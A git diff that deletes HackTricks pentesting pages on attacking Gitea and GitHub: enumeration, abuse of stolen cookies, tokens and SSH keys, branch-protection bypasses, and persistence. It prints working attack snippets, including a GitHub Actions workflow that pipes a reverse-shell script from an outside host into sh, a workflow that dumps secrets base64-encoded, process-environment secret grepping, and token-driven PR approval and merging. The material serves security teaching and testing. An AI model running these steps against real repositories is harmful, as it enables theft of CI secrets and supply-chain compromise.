- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gitea-security/README.md b/cloud-security/gitea-security/README.md deleted file mode 100644 index 9813f9de5..000000000 --- a/cloud-security/gitea-security/README.md +++ /dev/null @@ -1,171 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# What is Gitea - -**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go. - -![](<../../.gitbook/assets/image (655).png>) - -## Basic Information - -{% content-ref url="basic-gitea-information.md" %} -[basic-gitea-information.md](basic-gitea-information.md) -{% endcontent-ref %} - -# Lab - -To run a Gitea instance locally you can just run a docker container: - -```bash -docker run -p 3000:3000 gitea/gitea -``` - -Connect to port 3000 to access the web page. - -You could also run it with kubernetes: - -``` -helm repo add gitea-charts https://dl.gitea.io/charts/ -helm install gitea gitea-charts/gitea -``` - -# Unauthenticated Enumeration - -* Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos) -* Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users) -* Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations) - -Note that by **default Gitea allows new users to register**. This won't give especially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**. - -# Internal Exploitation - -For this scenario we are going to suppose that you have obtained some access to a Gitea account. - -## With User Credentials/Web Cookie - -If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how are the repos protected.** - -Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. 
- -{% hint style="info" %} -Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. -{% endhint %} - -## With User SSH Key - -Gitea allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied). - -With this key you can perform **changes in repositories where the user has some privileges**, however you cannot use it to access the Gitea API to enumerate the environment. However, you can **enumerate local settings** to get information about the repos and user you have access to: - -```bash -# Go to the repository folder -# Get repo config and current user name and email -git config --list -``` - -If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. - -**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about which key is related. - -### GPG Keys - -As explained [**here**](../github-security/basic-github-information.md#ssh-keys) sometimes it's needed to sign the commits or you might get discovered. - -Check locally if the current user has any key with: - -```shell -gpg --list-secret-keys --keyid-format=long -``` - -## With User Token - -For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens). - -A user token can be used **instead of a password** to **authenticate** against Gitea server [**via API**](https://try.gitea.io/api/swagger#/). It will have **complete access** over the user. 
- -## With Oauth Application - -For an introduction about [**Gitea Oauth Applications check the basic information**](basic-gitea-information.md#oauth-applications). - -An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accept it, probably as part of a phishing campaign. - -As explained in the basic information, the application will have **full access over the user account**. - -## Branch Protection Bypass - -In GitHub we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But let's take a look at what can be done: - -* **Enable Push**: If anyone with write access can push to the branch, just push to it. -* **Whitelist Restricted Push**: The same way, if you are part of this list push to the branch. -* **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it -* **Require approvals is bigger than 0**: Then... you need to compromise another user -* **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list -* **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR. - -Note that **if you are an org/repo admin** you can bypass the protections. - -## Enumerate Webhooks - -**Webhooks** are able to **send specific gitea information to some places**. 
You might be able to **exploit that communication**.\ -However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\ -But in some occasions, people instead of setting the **secret** in its place, they **set it in the URL** as a parameter, so **checking the URLs** could allow you to **find secrets** and other places you could exploit further. - -Webhooks can be set at **repo and at org level**. - -# Post Exploitation - -## Inside the server - -If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini` - -In this file you can find **keys** and **passwords**. - -In the gitea path (by default: /data/gitea) you can find also interesting information like: - -* The **sqlite** DB: If gitea is not using an external db it will use a sqlite db -* The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea could also save the sessions inside the DB). -* The **jwt private key** inside the jwt folder -* More **sensitive information** could be found in this folder - -If you are inside the server you can also **use the `gitea` binary** to access/modify information: - -* `gitea dump` will dump gitea and generate a .zip file -* `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence) -* `gitea admin user change-password --username admin --password newpassword` Change the password -* `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gitea-security/basic-gitea-information.md b/cloud-security/gitea-security/basic-gitea-information.md deleted file mode 100644 index 3707e7bc5..000000000 --- a/cloud-security/gitea-security/basic-gitea-information.md +++ /dev/null @@ -1,133 +0,0 @@ -# Basic Gitea Information - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## Basic Structure - -The basic gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization. - -Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**. - -A user may also be **part of different teams** with different permissions over different repos. - -And finally **repositories may have special protection mechanisms**. - -## Permissions - -### Organizations - -When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**. - -**Org admins** (owners) can select the **visibility** of the organization: - -* Public -* Limited (logged in users only) -* Private (members only) - -**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos. - -When creating a new team, several important settings are selected: - -* It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all. -* It's also indicated **if members can create new repos** (creator will get admin access to it) -* The **permissions** the **members** of the repo will **have**: - * **Administrator** access - * **Specific** access: - -![](<../../.gitbook/assets/image (648) (1).png>) - -### Teams & Users - -In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. 
There are **3** possible **roles**: - -* Administrator -* Write -* Read - -## Gitea Authentication - -### Web Access - -Using **username + password** and potentially (and recommended) a 2FA. - -### **SSH Keys** - -You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys) - -#### **GPG Keys** - -You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. - -### **Personal Access Tokens** - -You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications) - -### Oauth Applications - -Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet: - -![](<../../.gitbook/assets/image (662) (1).png>) - -### Deploy keys - -Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos. - -## Branch Protections - -Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. - -The **branch protections of a repository** can be found in _https://localhost:3000/\/\/settings/branches_ - -{% hint style="info" %} -It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. 
-{% endhint %} - -Different protections can be applied to a branch (like to master): - -* **Disable Push**: No-one can push to this branch -* **Enable Push**: Anyone with access can push, but not force push. -* **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push) -* **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs. -* **Enable Status checks:** Require status checks to pass before merging. -* **Require approvals**: Indicate the number of approvals required before a PR can be merged. -* **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs. -* **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass) -* **Block merge on official review requests**: If there are official review requests, it cannot be merged -* **Dismiss stale approvals**: When new commits are pushed, old approvals will be dismissed. -* **Require Signed Commits**: Commits must be signed. -* **Block merge if pull request is outdated** -* **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes - -{% hint style="info" %} -As you can see, even if you managed to obtain some credentials of a user, **repos might be protected, preventing you from pushing code to master**, for example to compromise the CI/CD pipeline. -{% endhint %} - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/github-security/README.md b/cloud-security/github-security/README.md deleted file mode 100644 index b2defdc31..000000000 --- a/cloud-security/github-security/README.md +++ /dev/null @@ -1,324 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# What is Github - -(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**. - -## Basic Information - -{% content-ref url="basic-github-information.md" %} -[basic-github-information.md](basic-github-information.md) -{% endcontent-ref %} - -# External Recon - -Github repositories can be configured as public, private and internal. - -* **Private** means that **only** people of the **organisation** will be able to access them -* **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it -* **Public** means that **all internet** is going to be able to access it. - -In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**. - -## Github Dorks - -Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**. - -Tools (each tool contains its list of dorks): - -* [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks list](https://github.com/obheda12/GitDorker/tree/master/Dorks)) -* [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt)) -* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists)) - -## Github Leaks - -Please, note that the github dorks are also meant to search for leaks using github search options. 
This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits). - -Tools (each tool contains its list of regexes): - -* [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks) -* [https://github.com/trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) -* [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit) -* [https://github.com/michenriksen/gitrob](https://github.com/michenriksen/gitrob) -* [https://github.com/anshumanbh/git-all-secrets](https://github.com/anshumanbh/git-all-secrets) -* [https://github.com/kootenpv/gittyleaks](https://github.com/kootenpv/gittyleaks) -* [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets) - -# Internal Recon & Attacks - -For this scenario we are going to suppose that you have obtained some access to a github account. - -## With User Credentials - -If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.** - -Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. - -{% hint style="info" %} -Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. -{% endhint %} - -Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful. - -## With User SSH Key - -Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied). 
- -With this key you can perform **changes in repositories where the user has some privileges**, however you cannot use it to access the github api to enumerate the environment. However, you can **enumerate local settings** to get information about the repos and user you have access to: - -```bash -# Go to the repository folder -# Get repo config and current user name and email -git config --list -``` - -If the user has configured their username as their github username you can access the **public keys they have set** in their account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. - -**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about which repo each key is related to. - -### GPG Keys - -As explained [**here**](basic-github-information.md#ssh-keys) sometimes it's needed to sign the commits or you might get discovered. - -Check locally if the current user has any key with: - -```shell -gpg --list-secret-keys --keyid-format=long -``` - -## With User Token - -For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens). - -A user token can be used **instead of a password** for Git over HTTPS, or can be used to [**authenticate to the API over Basic Authentication**](https://docs.github.com/v3/auth/#basic-authentication). Depending on the privileges attached to it you might be able to perform different actions. - -A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123` - -## With Oauth Application - -For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications). 
- -An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accept it, probably as part of a phishing campaign. - -These are the [scopes an Oauth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). A user should always check the scopes requested before accepting them. - -Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation. - -## With Github Application - -For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications). - -An attacker might create a **malicious Github Application** to access privileged data/actions of the users that accept it, probably as part of a phishing campaign. - -Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation. - -## Enumerate Webhooks - -**Webhooks** are able to **send specific github information to some places**. You might be able to **exploit that communication**.\ -However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret from **exploiting that webhook**.\ -But in some occasions, people instead of setting the **secret** in its place, they **set it in the URL** as a parameter, so **checking the URLs** could allow you to **find secrets** and other places you could exploit further. - -Webhooks can be set at **repo and at org level**. - -## With Malicious Github Action - -For an introduction about [**Github Actions check the basic information**](basic-github-information.md#git-actions). - -In case you can **execute arbitrary github actions** in a **repository**, you can **steal the secrets from that repo**. 
- -### Github Action Execution from Repo Creation - -In case members of an organization can **create new repos** and you can execute github actions, you can **create a new repo and steal the secrets set at organization level**. - -### Github Action from a New Branch - -If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called). - -You can make the modified action executable **manually,** when a **PR is created** or when **some code is pushed** (depending on how noisy you want to be): - -```yaml -on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - master - push: # Run it when a push is made to a branch - branches: - - current_branch_name - -# Use '**' instead of a branh name to trigger the action in all the cranches -``` - -### Github Action Injection/Backdoor - -In case you somehow managed to **infiltrate inside a Github Action**, if you can escalate privileges you can **steal secrets from the processes where secrets have been set in**. In some cases you don't even need to escalate privileges. - -```bash -cat /proc//environ -cat /proc/*/environ | grep -i secret #Suposing the env variable name contains "secret" -``` - -### GITHUB\_TOKEN - -This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given by default read and **write permissions** **to the repo**. 
This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps) - -You can see the possible **permissions** of this token in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github\_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github\_token) - -These tokens looks like this: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7` - -Some interesting things you can do with this token: - -```bash -# Merge PR -curl -X PUT \ - https://api.github.com/repos///pulls//merge \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header 'content-type: application/json' \ - -d '{"commit_title":"commit_title"}' - -# Approve a PR -curl -X POST \ - https://api.github.com/repos///pulls//reviews \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header 'content-type: application/json' \ - -d '{"event":"APPROVE"}' - -# Create a PR -curl -X POST \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header 'content-type: application/json' \ - https://api.github.com/repos///pulls \ - -d '{"head":"","base":"master", "title":"title"}' -``` - -{% hint style="danger" %} -Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization. 
-{% endhint %} - -### List secrets in Github Action output - -```yaml -name: list_env -on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - '**' - push: # Run it when a push is made to a branch - branches: - - '**' -jobs: - List_env: - runs-on: ubuntu-latest - steps: - - name: List Env - # Need to base64 encode or github will change the secret value for "***" - run: sh -c 'env | grep "secret_" | base64 -w0' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} -``` - -### Get reverse shell with secrets - -```yaml -name: revshell -on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - '**' - push: # Run it when a push is made to a branch - branches: - - '**' -jobs: - create_pull_request: - runs-on: ubuntu-latest - steps: - - name: Get Rev Shell - run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} -``` - -## Branch Protection Bypass - -* **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB\_TOKEN** you might be able to **approve your PR** and get 1 approval this way. - * _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._ -* **Dismiss approvals when new commits are pushed**: If this isn’t set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch. 
-* **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**. - * When a **CODEOWNER file is misconfigured** Github doesn't complain but it doesn't use it. Therefore, if it's misconfigured its **Code Owners protection isn't applied.** -* **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections. -* **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass these branch protections. -* **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything. -* **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back. -* **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`). - * If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**. - -## Bypass Environments Protections - -For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments). - -In case an environment can be **accessed from all the branches**, it **isn't protected** and you can easily access the secrets inside the environment. 
Note that you might find repos where **all the branches are protected** (by specifying their names or by using `*`). In that scenario, **find a branch where you can push code** and you can **exfiltrate** the secrets creating a new github action (or modifying one). - -Note that you might find the edge case where **all the branches are protected** (via wildcard `*`), it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**. - -```yaml - push: # Run it when a push is made to a branch - branches: - - current_branch_name #Use '**' to run when a push is made to any branch -``` - -Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but by that time you will have already dumped the secrets. - -# Persistence - -* Generate **user token** -* Steal **github tokens** from **secrets** - * **Deletion** of workflow **results** and **branches** -* Give **more permissions to all the org** -* Create **webhooks** to exfiltrate information -* Invite **outside collaborators** -* **Remove** **webhooks** used by the **SIEM** -* Create/modify **Github Action** with a **backdoor** -* Find **vulnerable Github Action to command injection** via **secret** value modification - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/github-security/basic-github-information.md b/cloud-security/github-security/basic-github-information.md deleted file mode 100644 index 200459f9c..000000000 --- a/cloud-security/github-security/basic-github-information.md +++ /dev/null @@ -1,297 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Basic Structure - -The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations** and each of them may contain **several repositories** and **several teams.**. Smaller companies may just **own one organization and no enterprises**. - -From a user point of view a **user** can be a **member** of **different enterprises and organizations**. Within them the user may have **different enterprise, organization and repository roles**. - -Moreover, a user may be **part of different teams** with different enterprise, organization or repository roles. - -And finally **repositories may have special protection mechanisms**. - -# Privileges - -## Enterprise Roles - -* **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository -* **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**. - -## Organization Roles - -In an organisation users can have different roles: - -* **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization. -* **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**. -* **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information. -* **Security Managers**: It's a role that organization owners can assign to any team in an organization. 
